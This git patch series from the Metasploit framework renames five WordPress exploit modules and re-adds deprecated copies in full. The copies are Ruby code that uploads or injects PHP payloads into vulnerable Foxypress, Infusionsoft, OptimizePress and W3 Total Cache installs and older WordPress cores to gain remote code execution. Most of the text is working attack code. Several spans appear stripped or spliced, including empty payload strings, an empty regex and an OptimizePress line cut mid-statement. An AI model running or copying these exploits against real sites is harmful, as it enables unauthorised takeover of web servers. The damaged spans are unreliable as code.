From b191f92713ea4cf754c21a9028657ff78fecc71e Mon Sep 17 00:00:00 2001 From: aushack Date: Mon, 23 Mar 2015 18:15:04 +1100 Subject: [PATCH 1/2] Renamed WordPress files to fit majority naming convention. --- .../webapp/{php_wordpress_foxypress.rb => wp_foxypress_upload.rb} | 0 .../{php_wordpress_infusionsoft.rb => wp_infusionsoft_upload.rb} | 0 .../webapp/{php_wordpress_lastpost.rb => wp_lastpost_exec.rb} | 0 ...{php_wordpress_optimizepress.rb => wp_optimizepress_upload.rb} | 0 .../{php_wordpress_total_cache.rb => wp_total_cache_exec.rb} | 0 5 files changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/unix/webapp/{php_wordpress_foxypress.rb => wp_foxypress_upload.rb} (100%) rename modules/exploits/unix/webapp/{php_wordpress_infusionsoft.rb => wp_infusionsoft_upload.rb} (100%) rename modules/exploits/unix/webapp/{php_wordpress_lastpost.rb => wp_lastpost_exec.rb} (100%) rename modules/exploits/unix/webapp/{php_wordpress_optimizepress.rb => wp_optimizepress_upload.rb} (100%) rename modules/exploits/unix/webapp/{php_wordpress_total_cache.rb => wp_total_cache_exec.rb} (100%) diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb similarity index 100% rename from modules/exploits/unix/webapp/php_wordpress_foxypress.rb rename to modules/exploits/unix/webapp/wp_foxypress_upload.rb diff --git a/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb similarity index 100% rename from modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb rename to modules/exploits/unix/webapp/wp_infusionsoft_upload.rb diff --git a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb b/modules/exploits/unix/webapp/wp_lastpost_exec.rb similarity index 100% rename from modules/exploits/unix/webapp/php_wordpress_lastpost.rb rename to modules/exploits/unix/webapp/wp_lastpost_exec.rb diff --git a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb similarity index 100% rename from modules/exploits/unix/webapp/php_wordpress_optimizepress.rb rename to modules/exploits/unix/webapp/wp_optimizepress_upload.rb diff --git a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb similarity index 100% rename from modules/exploits/unix/webapp/php_wordpress_total_cache.rb rename to modules/exploits/unix/webapp/wp_total_cache_exec.rb From e338b7738986ce01d564f1a1b0430c2be692d3a1 Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 23 Mar 2015 23:40:11 -0500 Subject: [PATCH 2/2] Readd and deprecate renamed WordPress modules --- .../unix/webapp/php_wordpress_foxypress.rb | 88 ++++++++ .../unix/webapp/php_wordpress_infusionsoft.rb | 85 +++++++ .../unix/webapp/php_wordpress_lastpost.rb | 82 +++++++ .../webapp/php_wordpress_optimizepress.rb | 150 +++++++++++++ .../unix/webapp/php_wordpress_total_cache.rb | 210 ++++++++++++++++++ 5 files changed, 615 insertions(+) create mode 100644 modules/exploits/unix/webapp/php_wordpress_foxypress.rb create mode 100644 modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb create mode 100644 modules/exploits/unix/webapp/php_wordpress_lastpost.rb create mode 100644 modules/exploits/unix/webapp/php_wordpress_optimizepress.rb create mode 100644 modules/exploits/unix/webapp/php_wordpress_total_cache.rb diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb new file mode 100644 index 0000000000..d76c5a9e9a --- /dev/null +++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb @@ -0,0 +1,88 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper + include Msf::Module::Deprecated + + deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_foxypress_upload') + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution', + 'Description' => %q( + This module exploits an arbitrary PHP code execution flaw in the WordPress + blogging software plugin known as Foxypress. The vulnerability allows for arbitrary + file upload and remote code execution via the uploadify.php script. The Foxypress + plug-in versions 0.4.1.1 to 0.4.2.1 are vulnerable. + ), + 'Author' => + [ + 'Sammy FORGIT', # Vulnerability Discovery, PoC + 'patrick' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['EDB', '18991'], + ['OSVDB' '82652'], + ['BID', '53805'], + ['WPVDB', '6231'] + ], + 'Privileged' => false, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Foxypress 0.4.1.1 - 0.4.2.1', {}]], + 'DisclosureDate' => 'Jun 05 2012', + 'DefaultTarget' => 0)) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php') + ) + + return Exploit::CheckCode::Detected if res && res.code == 200 + + Exploit::CheckCode::Safe + end + + def exploit + post_data = Rex::MIME::Message.new + post_data.add_part("", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") + + print_status("#{peer} - Sending PHP payload") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'), + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'data' => post_data.to_s + ) + + if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ + print_error("#{peer} - File wasn't uploaded, aborting!") + return + end + + filename = "#{Regexp.last_match[1]}.php" + + print_good("#{peer} - Our payload is at: #{filename}. Calling payload...") + register_files_for_cleanup(filename) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename) + ) + + print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200 + end +end diff --git a/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb b/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb new file mode 100644 index 0000000000..bf6d305b62 --- /dev/null +++ b/modules/exploits/unix/webapp/php_wordpress_infusionsoft.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper + include Msf::Module::Deprecated + + deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_infusionsoft_upload') + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wordpress InfusionSoft Upload Vulnerability', + 'Description' => %q{ + This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity + Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file + upload and remote code execution. + }, + 'Author' => + [ + 'g0blin', # Vulnerability Discovery + 'us3r777 ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-6446'], + ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'], + ['WPVDB', '7634'] + ], + 'Privileged' => false, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Infusionsoft 1.5.3 - 1.5.10', {}]], + 'DisclosureDate' => 'Sep 25 2014', + 'DefaultTarget' => 0) + ) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php') + ) + + if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/ + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def exploit + php_pagename = rand_text_alpha(8 + rand(8)) + '.php' + res = send_request_cgi({ + 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', + 'Infusionsoft', 'utilities', 'code_generator.php'), + 'method' => 'POST', + 'vars_post' => + { + 'fileNamePattern' => php_pagename, + 'fileTemplate' => payload.encoded + } + }) + + if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/ + print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + register_files_for_cleanup(php_pagename) + else + fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}") + end + + print_status("#{peer} - Calling payload ...") + send_request_cgi({ + 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', + 'Infusionsoft', 'utilities', php_pagename) + }, 2) + end + +end diff --git a/modules/exploits/unix/webapp/php_wordpress_lastpost.rb b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb new file mode 100644 index 0000000000..cd7ac0e832 --- /dev/null +++ b/modules/exploits/unix/webapp/php_wordpress_lastpost.rb @@ -0,0 +1,82 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + include Msf::Module::Deprecated + + deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_lastpost_exec') + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress cache_lastpostdate Arbitrary Code Execution', + 'Description' => %q{ + This module exploits an arbitrary PHP code execution flaw in the WordPress + blogging software. This vulnerability is only present when the PHP 'register_globals' + option is enabled (common for hosting providers). All versions of WordPress prior to + 1.5.1.3 are affected. + }, + 'Author' => [ 'str0ke ', 'hdm' ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2005-2612'], + ['OSVDB', '18672'], + ['BID', '14533'], + ['WPVDB', '6034'] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find' + }, + 'Space' => 512 + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Aug 9 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to WordPress", "/"]), + ], self.class) + end + + def exploit + + enc = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)" + str = Rex::Text.encode_base64('args[0]=eval(base64_decode('+enc+')).die()&args[1]=x') + data = + "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;"+ + "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;"+ + "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]="+str+ + ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;"+ + "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;"+ + "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;" + + # Trigger the command execution bug + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URI']), + 'cookie' => data + }, 25) + + if (res) + print_status("The server returned: #{res.code} #{res.message}") + else + print_status("No response from the server") + end + end + +end diff --git a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb new file mode 100644 index 0000000000..e487bc3ddc --- /dev/null +++ b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb @@ -0,0 +1,150 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'uri' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::HTTP::Wordpress + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include Msf::Module::Deprecated + + deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_optimizepress_upload') + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress OptimizePress Theme File Upload Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The + vulnerability is due to an insecure file upload on the media-upload.php component, allowing + an attacker to upload arbitrary PHP code. This module has been tested successfully on + OptimizePress 1.45. + }, + 'Author' => + [ + 'United of Muslim Cyber Army', # Vulnerability discovery + 'Mekanismen' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ], + [ 'WPVDB', '7441' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [ ['OptimizePress', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 29 2013' + )) + + register_advanced_options( + [ + OptString.new('THEMEDIR', [ true, 'OptimizePress Theme directory', 'OptimizePress']) + ]) + end + + def check + uri = target_uri.path + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php') + }) + + if res and res.code == 200 and res.body.to_s =~ /Upload New Image/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + uri = normalize_uri(target_uri.path) + + #get upload filepath + print_status("#{peer} - Getting the upload path...") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php') + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL") + end + + if res.body =~ // + file_path = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath") + end + + #set cookie + cookie = res.get_cookies + + filename = rand_text_alphanumeric(8) + ".php" + + #upload payload + post_data = Rex::MIME::Message.new + post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"newcsimg\"; filename=\"#{filename}\"") + post_data.add_part("Upload File", nil, nil, "form-data; name=\"button\"") + post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"") + post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"") + + print_status("#{peer} - Uploading PHP payload...") + + n_data = post_data.to_s + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'), + 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, + 'data' => n_data, + 'headers' => { + 'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php" + }, + 'cookie' => cookie + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to upload payload") + end + + print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...") + #get path to payload + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php') + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL") + end + + payload_url = "" + + if res.body =~ /name="cs_img" value="(.*#{filename}.*)" \/> 'GET', + 'uri' => u.path + }) + end +end diff --git a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb new file mode 100644 index 0000000000..32bf79fc18 --- /dev/null +++ b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb @@ -0,0 +1,210 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class Metasploit3 < Msf::Exploit::Remote + include Msf::HTTP::Wordpress + include Msf::Exploit::Remote::HttpClient + include Msf::Module::Deprecated + + deprecated(Date.new(2014, 5, 23), 'exploit/unix/webapp/wp_total_cache_exec') + + Rank = ExcellentRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wordpress W3 Total Cache PHP Code Execution', + 'Description' => %q{ + This module exploits a PHP Code Injection vulnerability against Wordpress plugin + W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older + is also reported as vulnerable. The vulnerability is due to the handling of certain + macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is + needed in order to add the malicious comment. If the POSTID option isn't specified, + then the module will automatically find or bruteforce one. Also, if anonymous comments + aren't allowed, then a valid username and password must be provided. In addition, + the "A comment is held for moderation" option on Wordpress must be unchecked for + successful exploitation. This module has been tested against Wordpress 3.5 and + W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system. + }, + 'Author' => + [ + 'Unknown', # Vulnerability discovery + 'juan vazquez', # Metasploit module + 'hdm', # Metasploit module + 'Christian Mehlmauer' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-2010' ], + [ 'OSVDB', '92652' ], + [ 'BID', '59316' ], + [ 'URL', 'http://wordpress.org/support/topic/pwn3d' ], + [ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ], + [ 'WPVDB', '6622' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Targets' => [ ['Wordpress 3.5', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 17 2013' + )) + + register_options( + [ + OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]), + OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]), + OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ]) + ], self.class) + + register_advanced_options( + [ + OptInt.new('MIN_POST_ID', [ false, 'Specify the first post_id used for bruteforce', 1]), + OptInt.new('MAX_POST_ID', [ false, 'Specify the last post_id used for bruteforce', 1000]) + ]) + end + + def require_auth? + @user = datastore['USERNAME'] + @password = datastore['PASSWORD'] + + if @user and @password and not @user.empty? and not @password.empty? + return true + else + return false + end + end + + def post_comment(text) + php_payload = "#{text}" + + if @auth + uri = wordpress_post_comment_auth(php_payload, @post_id, @cookie) + else + author = rand_text_alpha(8) + author_email = "#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com" + author_url = rand_text_alpha(8) + uri = wordpress_post_comment_no_auth(php_payload, + @post_id, + author, + author_email, + author_url + ) + @unauth_cookie = wordpress_get_unauth_comment_cookies(author, author_email, author_url) + end + uri + end + + def exploit + unless wordpress_and_online? + fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site") + end + + @auth = require_auth? + + if @auth + print_status("#{peer} - Trying to login...") + @cookie = wordpress_login(@user, @password) + if @cookie.nil? + fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful") + end + print_status("#{peer} - login successful") + else + print_status("#{peer} - Trying unauthenticated exploitation...") + end + + if datastore['POSTID'] and datastore['POSTID'] != 0 + @post_id = datastore['POSTID'] + print_status("#{peer} - Using the user supplied POST ID #{@post_id}...") + else + print_status("#{peer} - Trying to get posts from feed...") + all_posts = wordpress_get_all_blog_posts_via_feed + # First try all blog posts provided by feed + if all_posts + all_posts.each do |p| + vprint_status("#{peer} - Checking #{p}...") + enabled = wordpress_post_comments_enabled?(p, @cookie) + @post_id = get_post_id_from_body(enabled) + if @post_id + print_status("#{peer} - Found Post POST ID #{@post_id}...") + break + end + end + end + # if nothing found, bruteforce a post id + unless @post_id + print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...") + min_post_id = datastore['MIN_POST_ID'] + max_post_id = datastore['MAX_POST_ID'] + @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie) + if @post_id.nil? + fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment") + else + print_status("#{peer} - Using the brute forced POST ID #{@post_id}...") + end + end + end + + random_test = rand_text_alpha(64) + @sum = Rex::Text.sha1(random_test) + + print_status("#{peer} - Injecting the PHP Code in a comment...") + text = Rex::Text::rand_text_alpha(10) + post_uri = post_comment(text) + if post_uri.nil? + fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned") + end + + print_status("#{peer} - Executing the payload...") + options = { + 'method' => 'GET', + 'uri' => post_uri, + 'headers' => { + 'Cmd' => Rex::Text.encode_base64(payload.encoded), + 'Sum' => random_test + } + } + options.merge!({'cookie' => @cookie}) if @auth + # Used to see anonymous, moderated comments + options.merge!({'cookie' => @unauth_cookie}) if @unauth_cookie + res = send_request_cgi(options) + if res and res.code == 301 + fail_with(Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated") + end + + if res and !res.body.match(/#{Regexp.escape(text)}/) + fail_with(Failure::Unknown, "#{peer} - Comment not in post, maybe comments are moderated") + end + + end + + def check + res = wordpress_and_online? + unless res + vprint_error("#{peer} does not seeem to be Wordpress site") + return Exploit::CheckCode::Unknown + end + + if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/ + version = $1 + if version <= "0.9.2.8" + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + if res.body and (res.body =~ /Performance optimized by W3 Total Cache/ or res.body =~ /Cached page generated by WP-Super-Cache/) + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + + end +end